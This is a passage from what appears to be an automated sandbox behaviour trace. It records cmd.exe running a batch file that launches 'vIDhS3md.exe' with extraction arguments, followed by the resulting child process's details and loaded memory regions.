returned 4 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0300.028] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0300.029] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0300.029] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0300.029] SetErrorMode (uMode=0x0) returned 0x0 [0300.029] SetErrorMode (uMode=0x1) returned 0x0 [0300.029] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51f930, lpFilePart=0x19e7ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x19e7ac*="Desktop") returned 0x1d [0300.029] SetErrorMode (uMode=0x0) returned 0x1 [0300.029] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0300.029] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0300.030] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0300.030] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.030] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0x19e558, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e558) returned 0x51d7d8 [0300.030] FindClose (in: hFindFile=0x51d7d8 | out: hFindFile=0x51d7d8) returned 1 [0300.030] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0300.030] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0300.030] GetConsoleTitleW (in: lpConsoleTitle=0x19ea2c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0300.031] InitializeProcThreadAttributeList (in: lpAttributeList=0x19e958, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19e93c | out: lpAttributeList=0x19e958, lpSize=0x19e93c) returned 1 [0300.031] UpdateProcThreadAttribute (in: lpAttributeList=0x19e958, dwFlags=0x0, Attribute=0x60001, lpValue=0x19e944, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19e958, lpPreviousValue=0x0) returned 1 [0300.031] GetStartupInfoW (in: lpStartupInfo=0x19e990 | out: lpStartupInfo=0x19e990*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"exp", _MaxCount=0x7) returned -3 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.031] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0300.032] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0300.032] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0300.032] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x19e8e0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19e92c | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x19e92c*(hProcess=0xb8, hThread=0xcc, dwProcessId=0xb30, dwThreadId=0xb28)) returned 1 [0300.038] CloseHandle (hObject=0xcc) returned 1 [0300.038] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0300.038] GetEnvironmentStringsW () returned 0x51e080* [0300.039] FreeEnvironmentStringsA (penv="=") returned 1 [0300.039] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0301.088] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x19e8c4 | out: lpExitCode=0x19e8c4*=0x1) returned 1 [0301.088] CloseHandle (hObject=0xb8) returned 1 [0301.088] _vsnwprintf (in: _Buffer=0x19e9ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x19e8cc | out: _Buffer="00000001") returned 8 [0301.088] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0301.088] GetEnvironmentStringsW () returned 0x51e080* [0301.088] FreeEnvironmentStringsA (penv="=") returned 1 [0301.088] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0301.088] GetEnvironmentStringsW () returned 0x51e080* [0301.088] FreeEnvironmentStringsA (penv="=") returned 1 [0301.088] DeleteProcThreadAttributeList (in: lpAttributeList=0x19e958 | out: lpAttributeList=0x19e958) [0301.088] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.088] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.113] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.113] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.113] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.113] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.113] SetConsoleInputExeNameW () returned 0x1 [0301.113] GetConsoleOutputCP () returned 0x1b5 [0301.113] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.113] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.113] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f28c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0301.114] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0301.114] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.114] SetFilePointer (in: hFile=0xb8, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.114] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.114] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.114] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x19f25c*=0x0, lpOverlapped=0x0) returned 1 [0301.115] GetLastError () returned 0x0 [0301.115] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.115] GetFileType (hFile=0xb8) returned 0x1 [0301.115] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.115] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.115] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.115] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.115] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x19f25c*=0x0, lpOverlapped=0x0) returned 1 [0301.115] GetLastError () returned 0x0 [0301.115] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.115] GetFileType (hFile=0xb8) returned 0x1 [0301.115] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.115] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.115] longjmp () [0301.115] _tell (_FileHandle=3) returned 226 [0301.115] _close (_FileHandle=3) returned 0 [0301.115] CmdBatNotificationStub () returned 0x1 [0301.115] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.115] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.115] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.115] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.116] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.116] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.116] SetConsoleInputExeNameW () returned 0x1 [0301.116] GetConsoleOutputCP () returned 0x1b5 [0301.116] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.116] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.116] exit (_Code=1) Thread: id = 909 os_tid = 0x290 Process: id = "106" image_name = "vidhs3md64.exe" filename = "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe" page_root = "0x429ec000" os_pid = "0xf00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "98" os_parent_pid = "0xbd4" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7667 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7668 start_va = 0x30000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7669 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 7670 start_va = 0x7f0a9000 end_va = 0x7f0a9fff entry_point = 0x0 region_type = private name = "private_0x000000007f0a9000" filename = "" Region: id = 7671 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7672 start_va = 0x140000000 end_va = 0x140045fff entry_point = 0x140000000 region_type = mapped_file name = "vidhs3md64.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe") Region: id = 7673 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 7674 start_va = 0x7ff5ffffc000 end_va = 0x7ff5ffffdfff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffc000" filename = "" Region: id = 7675 start_va = 0x7ff5ffffe000 end_va = 0x7ff5ffffefff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffe000" filename = "" Region: id = 7676 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7769 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 7780 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 7781 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7831 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7832 start_va = 0x180000 end_va = 0x23dfff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7833 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 7834 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 7835 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7836 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7837 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7838 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7839 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7840 start_va = 0x7ff5ffffa000 end_va = 0x7ff5ffffbfff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffa000" filename = "" Region: id = 7841 start_va = 0x7ffaf7930000 end_va = 0x7ffaf7a07fff entry_point = 0x7ffaf7930000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 7842 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7843 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7844 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7845 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 7846 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7847 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7848 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7849 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 7850 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7851 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7852 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 7853 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 7854 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7865 start_va = 0x7ffae5c40000 end_va = 0x7ffae5ce9fff entry_point = 0x7ffae5c40000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 7866 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 7867 start_va = 0x240000 end_va = 0x273fff entry_point = 0x240000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7868 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 7869 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = 